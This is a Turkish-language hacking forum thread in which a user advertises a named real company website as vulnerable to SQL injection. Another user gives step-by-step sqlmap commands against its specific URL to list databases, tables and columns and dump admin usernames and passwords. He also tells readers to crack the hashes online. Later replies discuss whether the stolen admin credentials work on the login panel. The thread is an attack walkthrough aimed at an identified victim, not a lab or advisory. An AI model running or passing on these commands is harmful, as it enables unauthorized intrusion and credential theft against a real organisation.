1x SQL Açıklı Site

By 4lp3r3n · 8 Haz 2024

Sriwijaya Palm Oil Group

spog.co.id

hidrhyme · 9 Haz 2024

Bu açığı nasıl kullanırız? sqlmap ile mi?

Ertugrul' · 9 Haz 2024

hidrhyme' Alıntı:
Bu açığı nasıl kullanırız? sqlmap ile mi?

Komutları basit bir şekilde açıklıyayım.
Terminale girip;

1. Kod:

Kod:

sqlmap -u "https://spog.co.id/index.php?action=newsmore&id=1" --dbs

Yazarsanız siteyi tarar ve en altta size bulunan database lerş verir.

2. Kod:

Kod:

sqlmap -u "https://spog.co.id/index.php?action=newsmore&id=1" -D (database adı) --tables

Bu kod sütununda ise senin vermiş olduğun databasei taratır ve içindeki tabloları sıralar. Ben bu siteyi test için taratmıştım tabloların en üstünde admin tablosu yer alıyor zaten.

3. Kod:

Kod:

sqlmap -u "https://spog.co.id/index.php?action=newsmore&id=1" -D (database adı) -T (tablo adı örneğin: admin) --columns

Bu kodu yazdıktan sonra ise admin tablosundaki colonları taratır. Bu siteyi tarattığın zaman çıkıcak sonu şunlar;
İD
UserName
Password
Son olarak bilgileri dump etmek kaldı.

4. Kod:

Kod:

sqlmap -u "https://spog.co.id/index.php?action=newsmore&id=1" -D (database adı) -T (tablo adı örneğin: admin) -C (Colon İsimleri Örneğin: id,username,password) --dump

Bu kodu yazdıktan sonra ise sana admin bilgilerini dump edicektir. Bazen MD5 SH1 gibi şifreler çıkıyor onlarıda chrome üzerinde hashes sitelerden çözebilirsin.

SqlMap sadece bu kadar değil daha birkaç ayrıntı daha var ben sadece kısaca temel kodları anlattım bu kodlar ile admin bilgilerine erişebilirsin.

Not: Önüne bazen Y/N soruları çıkıcak onların hepsine Y diyip geçebilirsin.

hidrhyme · 9 Haz 2024

Ertugrul'' Alıntı:
Komutları basit bir şekilde açıklıyayım.
Terminale girip;

1. Kod:

Kod:

sqlmap -u "https://spog.co.id/index.php?action=newsmore&id=1" --dbs

Yazarsanız siteyi tarar ve en altta size bulunan database lerş verir.

2. Kod:

Kod:

sqlmap -u "https://spog.co.id/index.php?action=newsmore&id=1" -D (database adı) --tables

Bu kod sütununda ise senin vermiş olduğun databasei taratır ve içindeki tabloları sıralar. Ben bu siteyi test için taratmıştım tabloların en üstünde admin tablosu yer alıyor zaten.

3. Kod:

Kod:

sqlmap -u "https://spog.co.id/index.php?action=newsmore&id=1" -D (database adı) -T (tablo adı örneğin: admin) --columns

Bu kodu yazdıktan sonra ise admin tablosundaki colonları taratır. Bu siteyi tarattığın zaman çıkıcak sonu şunlar;
İD
UserName
Password
Son olarak bilgileri dump etmek kaldı.

4. Kod:

Kod:

sqlmap -u "https://spog.co.id/index.php?action=newsmore&id=1" -D (database adı) -T (tablo adı örneğin: admin) -C (Colon İsimleri Örneğin: id,username,password) --dump

Bu kodu yazdıktan sonra ise sana admin bilgilerini dump edicektir. Bazen MD5 SH1 gibi şifreler çıkıyor onlarıda chrome üzerinde hashes sitelerden çözebilirsin.

SqlMap sadece bu kadar değil daha birkaç ayrıntı daha var ben sadece kısaca temel kodları anlattım bu kodlar ile admin bilgilerine erişebilirsin.

Not: Önüne bazen Y/N soruları çıkıcak onların hepsine Y diyip geçebilirsin.

Sağol kral cansın

bqtw · 9 Haz 2024

By 4lp3r3n' Alıntı:
Sriwijaya Palm Oil Group

spog.co.id

Admin bilgileri panel ile uyuşmuyor çöp

By 4lp3r3n · 9 Haz 2024

bqtw' Alıntı:
Admin bilgileri panel ile uyuşmuyor çöp

Bende yeni farkettim hocam admin panele admin admin yazarsanizda password Salah yazıyor onu çözmeye calisiyorum

hidrhyme' Alıntı:
Bu açığı nasıl kullanırız? sqlmap ile mi?

Sqlmap en iyisi olur Havin var alternatif ama büyük ihtimal çalışmaz manuel yapabilirsiniz oda çok zahmetli

1x SQL Açıklı Site

By 4lp3r3n

Üye

Sriwijaya Palm Oil Group

hidrhyme

Yeni üye

Ertugrul'

Basın&Medya Ekibi Deneyimli

hidrhyme

Yeni üye

bqtw

Üye

Sriwijaya Palm Oil Group

By 4lp3r3n

Üye

Sosyal medya sayfalarımız